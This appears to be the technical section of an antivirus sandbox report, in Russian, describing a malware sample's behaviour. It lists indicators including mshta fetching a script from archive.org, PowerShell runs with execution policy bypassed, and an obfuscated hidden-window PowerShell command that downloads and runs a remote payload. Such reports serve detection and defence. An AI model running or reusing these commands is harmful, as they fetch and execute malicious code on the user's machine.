Техническая информация
- '<SYSTEM32>\mshta.exe' https://ia601503.us.archive.org/19/items/google_20210527/google.txt
- %WINDIR%\microsoft.net\framework\v4.0.30319\msbuild.exe
- C:\users\public\msi.ps1
- 'ia#####3.us.archive.org':443
- 'cr#.#odaddy.com':80
- 'ia#####7.us.archive.org':443
- 'fi#####iworkshop.org':443
- 'ia#####9.us.archive.org':443
- http://cr#.#odaddy.com/gdroot.crl
- DNS ASK ia#####3.us.archive.org
- DNS ASK cr#.#odaddy.com
- DNS ASK ia#####7.us.archive.org
- DNS ASK fi#####iworkshop.org
- DNS ASK ia#####9.us.archive.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\msi.ps1'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $www='https://ia601407.us.archive.org/12/items/4_20210527_20210527_1306/4.txt';$sss= '(NESTRDTYUGIHGYFTRDYTFYUbj'.Replace('ESTRDTYUGIHGYFTRDYTFYU','ew-O');$aaa='ecAAAAAAAAAAAm.NBBBBBBBBBBBBBBbC...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $www='https://ia601407.us.archive.org/12/items/4_20210527_20210527_1306/4.txt';$sss= '(NESTRDTYUGIHGYFTRDYTFYUbj'.Replace('ESTRDTYUGIHGYFTRDYTFYU','ew-O');$aaa='ecAAAAAAAAAAAm.NBBBBBBBBBBBBBBbC...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\11.ps1'"